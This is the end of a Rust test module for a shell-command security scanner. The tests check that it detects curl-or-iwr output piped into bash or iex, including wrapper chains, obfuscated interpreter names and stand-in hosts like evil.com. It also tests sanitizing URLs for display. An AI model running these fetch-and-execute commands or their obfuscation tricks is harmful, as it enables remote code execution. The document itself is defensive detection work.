2987        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2988    }
2989
2990    #[test]
2991    fn test_vet_skipped_in_paste_context() {
2992        let dir = tempfile::tempdir().unwrap();
2993        let cwd = dir.path().to_str().unwrap();
2994        let findings = check(
2995            "cargo install serde_json",
2996            ShellType::Posix,
2997            Some(cwd),
2998            ScanContext::Paste,
2999        );
3000        assert!(!findings
3001            .iter()
3002            .any(|f| f.rule_id == RuleId::VetNotConfigured));
3003    }
3004
3005    #[test]
3006    fn test_vet_no_false_positive_on_non_install_subcommand() {
3007        let dir = tempfile::tempdir().unwrap();
3008        let cwd = dir.path().to_str().unwrap();
3009        let f1 = check(
3010            "cargo test --package add",
3011            ShellType::Posix,
3012            Some(cwd),
3013            ScanContext::Exec,
3014        );
3015        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
3016        let f2 = check(
3017            "cargo build install",
3018            ShellType::Posix,
3019            Some(cwd),
3020            ScanContext::Exec,
3021        );
3022        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
3023    }
3024
3025    #[test]
3026    fn test_vet_detects_cargo_exe_windows_path() {
3027        let dir = tempfile::tempdir().unwrap();
3028        let cwd = dir.path().to_str().unwrap();
3029        let f1 = check(
3030            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
3031            ShellType::PowerShell,
3032            Some(cwd),
3033            ScanContext::Exec,
3034        );
3035        assert!(
3036            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
3037            "should detect cargo.exe with Windows backslash path"
3038        );
3039        let f2 = check(
3040            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
3041            ShellType::PowerShell,
3042            Some(cwd),
3043            ScanContext::Exec,
3044        );
3045        assert!(
3046            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
3047            "should detect CARGO.EXE case-insensitively"
3048        );
3049    }
3050
3051    // ── normalize_shell_token unit tests ──
3052
3053    #[test]
3054    fn test_normalize_ansi_c_basic() {
3055        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3056    }
3057
3058    #[test]
3059    fn test_normalize_ansi_c_hex() {
3060        assert_eq!(
3061            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
3062            "bash"
3063        );
3064    }
3065
3066    #[test]
3067    fn test_normalize_ansi_c_octal() {
3068        assert_eq!(
3069            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
3070            "bash"
3071        );
3072    }
3073
3074    #[test]
3075    fn test_normalize_ansi_c_octal_leading_zero() {
3076        // \057 = '/' (octal 057 = 47 decimal = '/')
3077        assert_eq!(
3078            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
3079            "/bin/bash"
3080        );
3081    }
3082
3083    #[test]
3084    fn test_normalize_ansi_c_bare_zero() {
3085        // \0 alone (no following octal digits) should still be NUL
3086        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
3087    }
3088
3089    #[test]
3090    fn test_normalize_ansi_c_unicode() {
3091        assert_eq!(
3092            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
3093            "bash"
3094        );
3095    }
3096
3097    #[test]
3098    fn test_normalize_double_quotes() {
3099        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
3100    }
3101
3102    #[test]
3103    fn test_normalize_cmd_caret_inside_double_quotes() {
3104        assert_eq!(normalize_shell_token("\"c^md\"", ShellType::Cmd), "cmd");
3105    }
3106
3107    #[test]
3108    fn test_normalize_single_quotes() {
3109        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
3110    }
3111
3112    #[test]
3113    fn test_normalize_backslash() {
3114        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
3115    }
3116
3117    #[test]
3118    fn test_normalize_empty_concat() {
3119        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
3120    }
3121
3122    #[test]
3123    fn test_normalize_mixed_concat() {
3124        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
3125    }
3126
3127    #[test]
3128    fn test_normalize_powershell_backtick() {
3129        assert_eq!(
3130            normalize_shell_token("`i`e`x", ShellType::PowerShell),
3131            "iex"
3132        );
3133    }
3134
3135    #[test]
3136    fn test_normalize_unclosed_single_quote() {
3137        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
3138        let result = normalize_shell_token("'bash", ShellType::Posix);
3139        assert_eq!(result, "bash");
3140    }
3141
3142    #[test]
3143    fn test_normalize_unclosed_double_quote() {
3144        let result = normalize_shell_token("\"bash", ShellType::Posix);
3145        assert_eq!(result, "bash");
3146    }
3147
3148    // ── normalize_cmd_base unit tests ──
3149
3150    #[test]
3151    fn test_cmd_base_path() {
3152        assert_eq!(
3153            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
3154            "bash"
3155        );
3156    }
3157
3158    #[test]
3159    fn test_cmd_base_ansi_c() {
3160        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
3161    }
3162
3163    #[test]
3164    fn test_cmd_base_exe() {
3165        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
3166    }
3167
3168    #[test]
3169    fn test_cmd_base_uppercase() {
3170        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
3171    }
3172
3173    #[test]
3174    fn test_cmd_base_powershell_path() {
3175        assert_eq!(
3176            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
3177            "bash"
3178        );
3179    }
3180
3181    #[test]
3182    fn test_cmd_base_encoded_path() {
3183        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
3184        assert_eq!(
3185            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
3186            "bash"
3187        );
3188    }
3189
3190    #[test]
3191    fn test_cmd_base_octal_encoded_path() {
3192        // $'\057bin\057bash' → /bin/bash → basename bash
3193        assert_eq!(
3194            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
3195            "bash"
3196        );
3197    }
3198
3199    #[test]
3200    fn test_cmd_base_env_s_value() {
3201        // "bash -x" → first word "bash"
3202        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
3203    }
3204
3205    #[test]
3206    fn test_cmd_base_path_with_args() {
3207        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
3208        assert_eq!(
3209            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
3210            "bash"
3211        );
3212    }
3213
3214    // ── resolve_interpreter_name tests for new patterns ──
3215
3216    #[test]
3217    fn test_resolve_ansi_c_quoted_bash() {
3218        let findings = check_default(
3219            "curl https://example.com/install.sh | $'bash'",
3220            ShellType::Posix,
3221        );
3222        assert!(
3223            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3224            "should detect ANSI-C quoted bash: {:?}",
3225            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
3226        );
3227    }
3228
3229    #[test]
3230    fn test_resolve_command_wrapper() {
3231        let findings = check_default(
3232            "curl https://example.com/install.sh | command bash",
3233            ShellType::Posix,
3234        );
3235        assert!(
3236            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3237            "should detect 'command bash'"
3238        );
3239    }
3240
3241    #[test]
3242    fn test_resolve_exec_a_wrapper() {
3243        let findings = check_default(
3244            "curl https://example.com/install.sh | exec -a myname bash",
3245            ShellType::Posix,
3246        );
3247        assert!(
3248            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3249            "should detect 'exec -a myname bash'"
3250        );
3251    }
3252
3253    #[test]
3254    fn test_resolve_nohup_wrapper() {
3255        let findings = check_default(
3256            "curl https://example.com/install.sh | nohup bash",
3257            ShellType::Posix,
3258        );
3259        assert!(
3260            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3261            "should detect 'nohup bash'"
3262        );
3263    }
3264
3265    #[test]
3266    fn test_resolve_wrapper_chain() {
3267        let findings = check_default(
3268            "curl https://example.com/install.sh | command sudo bash",
3269            ShellType::Posix,
3270        );
3271        assert!(
3272            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3273            "should detect wrapper chain 'command sudo bash'"
3274        );
3275    }
3276
3277    #[test]
3278    fn test_resolve_case_insensitive() {
3279        let findings = check_default(
3280            "curl https://example.com/install.sh | BASH",
3281            ShellType::Posix,
3282        );
3283        assert!(
3284            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3285            "should detect uppercase BASH"
3286        );
3287    }
3288
3289    #[test]
3290    fn test_resolve_powershell_backtick_iex() {
3291        let findings = check_default(
3292            "iwr https://evil.com/script.ps1 | `i`e`x",
3293            ShellType::PowerShell,
3294        );
3295        assert!(
3296            findings
3297                .iter()
3298                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
3299            "should detect PowerShell backtick-escaped iex"
3300        );
3301    }
3302
3303    // --- Remediation hint tests ---
3304
3305    #[test]
3306    fn test_pipe_to_interpreter_hint_with_url() {
3307        let input = "curl https://example.com/install.sh | bash";
3308        let segments = tokenize::tokenize(input, ShellType::Posix);
3309        let mut findings = Vec::new();
3310        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3311        assert_eq!(findings.len(), 1);
3312        assert!(
3313            findings[0]
3314                .description
3315                .contains("https://example.com/install.sh"),
3316            "should include extracted URL in hint"
3317        );
3318        assert!(
3319            findings[0].description.contains("getvet.sh"),
3320            "should mention vet"
3321        );
3322        if cfg!(unix) {
3323            assert!(
3324                findings[0].description.contains("tirith run"),
3325                "Unix builds should suggest tirith run"
3326            );
3327        }
3328    }
3329
3330    #[test]
3331    fn test_pipe_to_interpreter_hint_quoted_url() {
3332        let input = r#"curl "https://example.com/install.sh" | bash"#;
3333        let segments = tokenize::tokenize(input, ShellType::Posix);
3334        let mut findings = Vec::new();
3335        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3336        assert_eq!(findings.len(), 1);
3337        assert!(
3338            findings[0]
3339                .description
3340                .contains("https://example.com/install.sh"),
3341            "should extract URL from quoted arg"
3342        );
3343    }
3344
3345    #[test]
3346    fn test_pipe_to_interpreter_hint_flag_equals_url() {
3347        let input = "curl --url=https://example.com/install.sh | bash";
3348        let segments = tokenize::tokenize(input, ShellType::Posix);
3349        let mut findings = Vec::new();
3350        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3351        assert_eq!(findings.len(), 1);
3352        assert!(
3353            findings[0]
3354                .description
3355                .contains("https://example.com/install.sh"),
3356            "should extract URL from --flag=value"
3357        );
3358    }
3359
3360    #[test]
3361    fn test_pipe_to_interpreter_evidence_includes_all_source_urls() {
3362        let input =
3363            "curl https://trusted.example.com/install.sh https://evil.example.com/payload.sh | bash";
3364        let segments = tokenize::tokenize(input, ShellType::Posix);
3365        let mut findings = Vec::new();
3366        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3367        assert_eq!(findings.len(), 1);
3368
3369        let urls: Vec<&str> = findings[0]
3370            .evidence
3371            .iter()
3372            .filter_map(|e| match e {
3373                Evidence::Url { raw } => Some(raw.as_str()),
3374                _ => None,
3375            })
3376            .collect();
3377
3378        assert_eq!(
3379            urls.len(),
3380            2,
3381            "all source URLs must be preserved in evidence"
3382        );
3383        assert!(urls.contains(&"https://trusted.example.com/install.sh"));
3384        assert!(urls.contains(&"https://evil.example.com/payload.sh"));
3385    }
3386
3387    #[test]
3388    fn test_pipe_to_interpreter_no_hint_for_cat() {
3389        let input = "cat /tmp/script.sh | bash";
3390        let segments = tokenize::tokenize(input, ShellType::Posix);
3391        let mut findings = Vec::new();
3392        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3393        assert_eq!(findings.len(), 1);
3394        assert!(
3395            !findings[0].description.contains("getvet.sh"),
3396            "non-fetch source should NOT get vet hint"
3397        );
3398        assert!(
3399            !findings[0].description.contains("tirith run"),
3400            "non-fetch source should NOT get tirith run hint"
3401        );
3402    }
3403
3404    #[test]
3405    fn test_dashdash_stops_flag_skipping() {
3406        // "command -- -x" should treat -x as the command, not a flag
3407        let input = "curl https://example.com/install.sh | command -- bash";
3408        let segments = tokenize::tokenize(input, ShellType::Posix);
3409        let mut findings = Vec::new();
3410        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3411        assert_eq!(findings.len(), 1, "should detect bash after --");
3412    }
3413
3414    #[test]
3415    fn test_sudo_dashdash_resolves_command() {
3416        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
3417        let input = "curl https://example.com/install.sh | sudo -- bash";
3418        let segments = tokenize::tokenize(input, ShellType::Posix);
3419        let mut findings = Vec::new();
3420        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3421        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
3422        assert!(
3423            findings[0].description.contains("interpreter 'bash'"),
3424            "should resolve to bash: {}",
3425            findings[0].description
3426        );
3427    }
3428
3429    #[test]
3430    fn test_ansic_quoting_not_applied_to_fish() {
3431        // Fish doesn't support $'...' — it should be treated as literal $
3432        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
3433        // But POSIX should strip the $'...' wrapper
3434        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3435    }
3436
3437    #[test]
3438    fn test_powershell_doubled_single_quote() {
3439        // PowerShell: '' inside single quotes is an escaped literal '
3440        assert_eq!(
3441            normalize_shell_token("'it''s'", ShellType::PowerShell),
3442            "it's"
3443        );
3444        // POSIX: '' ends and reopens — produces empty join
3445        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
3446    }
3447
3448    #[test]
3449    fn test_sudo_combined_short_flags() {
3450        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
3451        let input = "curl https://example.com/install.sh | sudo -iu root bash";
3452        let segments = tokenize::tokenize(input, ShellType::Posix);
3453        let mut findings = Vec::new();
3454        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3455        assert_eq!(
3456            findings.len(),
3457            1,
3458            "should detect pipe to bash through sudo -iu root"
3459        );
3460        assert!(
3461            findings[0].description.contains("interpreter 'bash'"),
3462            "should resolve to bash, not root: {}",
3463            findings[0].description
3464        );
3465    }
3466
3467    #[test]
3468    fn test_pipe_to_interpreter_hint_iwr_powershell() {
3469        let input = "iwr https://evil.com/script.ps1 | iex";
3470        let segments = tokenize::tokenize(input, ShellType::PowerShell);
3471        let mut findings = Vec::new();
3472        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
3473        assert_eq!(findings.len(), 1);
3474        assert!(
3475            findings[0].description.contains("getvet.sh"),
3476            "iwr (PowerShell fetch) should get vet hint"
3477        );
3478        assert!(
3479            !findings[0].description.contains("tirith run"),
3480            "PowerShell fetch should NOT suggest tirith run"
3481        );
3482    }
3483
3484    #[test]
3485    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
3486        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
3487        let input = "curl https://example.com/\x1b[31mred | bash";
3488        let segments = tokenize::tokenize(input, ShellType::Posix);
3489        let mut findings = Vec::new();
3490        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3491        assert_eq!(findings.len(), 1);
3492        assert!(
3493            !findings[0].description.contains('\x1b'),
3494            "ANSI escape must be stripped from hint URL: {}",
3495            findings[0].description
3496        );
3497        assert!(
3498            findings[0]
3499                .description
3500                .contains("https://example.com/[31mred"),
3501            "URL should be present minus the ESC byte: {}",
3502            findings[0].description
3503        );
3504    }
3505
3506    #[test]
3507    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
3508        // Newline in URL arg could spoof extra output lines
3509        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
3510        let segments = tokenize::tokenize(input, ShellType::Posix);
3511        let mut findings = Vec::new();
3512        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3513        assert_eq!(findings.len(), 1);
3514        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
3515        let hint_line = findings[0]
3516            .description
3517            .lines()
3518            .find(|l| l.contains("Safer:"))
3519            .expect("should have hint line");
3520        assert!(
3521            hint_line.contains("example.com/FAKE"),
3522            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
3523        );
3524        // Verify no line starts with "FAKE" (would indicate injection)
3525        assert!(
3526            !findings[0]
3527                .description
3528                .lines()
3529                .any(|l| l.starts_with("FAKE")),
3530            "newline injection must not create a spoofed output line: {}",
3531            findings[0].description
3532        );
3533    }
3534
3535    #[test]
3536    fn test_sanitize_url_for_display() {
3537        assert_eq!(
3538            sanitize_url_for_display("https://ok.com/path"),
3539            "https://ok.com/path"
3540        );
3541        assert_eq!(
3542            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
3543            "https://evil.com/[31mred[0m"
3544        );
3545        assert_eq!(
3546            sanitize_url_for_display("https://evil.com/\n\rspoof"),
3547            "https://evil.com/spoof"
3548        );
3549        assert_eq!(
3550            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
3551            "https://evil.com/bellnull"
3552        );
3553    }
3554
3555    #[test]
3556    fn test_pipe_to_interpreter_cmd_quoted_caret_cmd() {
3557        let findings = check_default("curl https://evil.com | \"c^md\" /c dir", ShellType::Cmd);
3558        assert!(
3559            findings
3560                .iter()
3561                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
3562            "quoted cmd caret escapes should still detect the interpreter pipe"
3563        );
3564    }
3565
3566    #[test]
3567    fn test_redact_env_value_never_returns_secret() {
3568        assert_eq!(redact_env_value(""), "");
3569        assert_eq!(redact_env_value("sk-abc123"), "[REDACTED]");
3570        assert_eq!(redact_env_value("ABCDEFGHIJKLMNOPQRSTUVWX"), "[REDACTED]");
3571    }
3572
3573    #[test]
3574    fn test_source_command_arrays_consistent() {
3575        // is_source_command is composed from the three const arrays.
3576        // Verify all arrays contribute and is_source_command rejects unknowns.
3577        for cmd in POSIX_FETCH_COMMANDS {
3578            assert!(
3579                is_source_command(cmd),
3580                "POSIX_FETCH entry '{cmd}' not recognized"
3581            );
3582            assert!(
3583                is_url_fetch_command(cmd),
3584                "POSIX_FETCH entry '{cmd}' not in fetch union"
3585            );
3586        }
3587        for cmd in POWERSHELL_FETCH_COMMANDS {
3588            assert!(
3589                is_source_command(cmd),
3590                "PS_FETCH entry '{cmd}' not recognized"
3591            );
3592            assert!(
3593                is_url_fetch_command(cmd),
3594                "PS_FETCH entry '{cmd}' not in fetch union"
3595            );
3596        }
3597        for cmd in NON_FETCH_SOURCE_COMMANDS {
3598            assert!(
3599                is_source_command(cmd),
3600                "NON_FETCH entry '{cmd}' not recognized"
3601            );
3602            assert!(
3603                !is_url_fetch_command(cmd),
3604                "NON_FETCH entry '{cmd}' should not be in fetch union"
3605            );
3606        }
3607        assert!(
3608            !is_source_command("cat"),
3609            "cat should not be a source command"
3610        );
3611    }
3612}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs